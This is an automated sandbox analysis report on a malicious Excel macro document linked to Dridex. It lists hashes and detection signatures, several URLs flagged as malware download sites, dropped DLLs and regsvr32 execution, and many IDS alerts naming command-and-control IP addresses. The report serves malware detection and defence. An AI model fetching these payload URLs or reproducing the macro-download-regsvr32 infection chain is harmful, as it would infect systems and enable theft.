Analysis Report printouts of outstanding as of 01_20_2021.xlsm

Overview

General Information

Sample Name: printouts of outstanding as of 01_20_2021.xlsm
Analysis ID: 342170
MD5: 28e9c78dcffb4a80c7bcfcd818791940
SHA1: 0f239865c9e2bdd64d2017c7d26cac19dc7d3cde
SHA256: 09cceb619174c99d026734f860f26cda0107af31b9153a9f7d6613c86fd57772

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://cms.ivpr.org/by9zwa7p1.zip Avira URL Cloud: Label: malware
Source: http://monitrade.net/h79fwesfe.rar Avira URL Cloud: Label: malware
Source: http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip Avira URL Cloud: Label: malware
Source: http://laureys.be/uzssv27.rar Avira URL Cloud: Label: malware
Source: http://artec.com.tr/xkpffwn.zip Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: printouts of outstanding as of 01_20_2021.xlsm Virustotal: Detection: 24%
Source: printouts of outstanding as of 01_20_2021.xlsm ReversingLabs: Detection: 11%

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49191 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49192 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49199 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49204 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49209 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49212 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49216 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49225 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49232 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49238 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49241 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49244 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49246 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49249 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49256 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49257 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49260 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49271 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49279 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49283 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49293 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49286 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49305 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49309 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: h79fwesfe[1].rar.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: monitrade.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 194.225.58.214:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.185.147.185:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49171
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49170
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49174
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49177
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49177
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49179
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49180
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49180
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49182
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49183
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49184
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49187
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49190
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49190
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49191
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49192
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49193
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49194
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49196
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49199
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49200
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49202
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49202
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49203
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49204
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49207
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49208
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49208
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49209
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49206
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49206
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49210
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49212
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49213
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49213
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49215
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49216
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49219
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49222
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49225
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49224
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49227
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49228
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49229
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49231
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49232
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49235
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49238
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49241
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49239
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49239
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49240
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49243
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49244
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49245
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49245
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49246
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49248
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49249
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49251
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49251
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49252
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49253
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49254
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49254
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49256
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49257
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49260
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49259
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49264
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49263
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49265
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49265
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49267
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49267
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49266
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49269
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49270
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49271
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49273
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49273
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49275
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49276
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49279
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49280
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49280
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49281
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49281
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49283
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49282
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49288
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49287
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49290
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49290
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49292
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49293
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49294
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49296
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49296
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49286
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49297
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49298
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49299
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49299
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49302
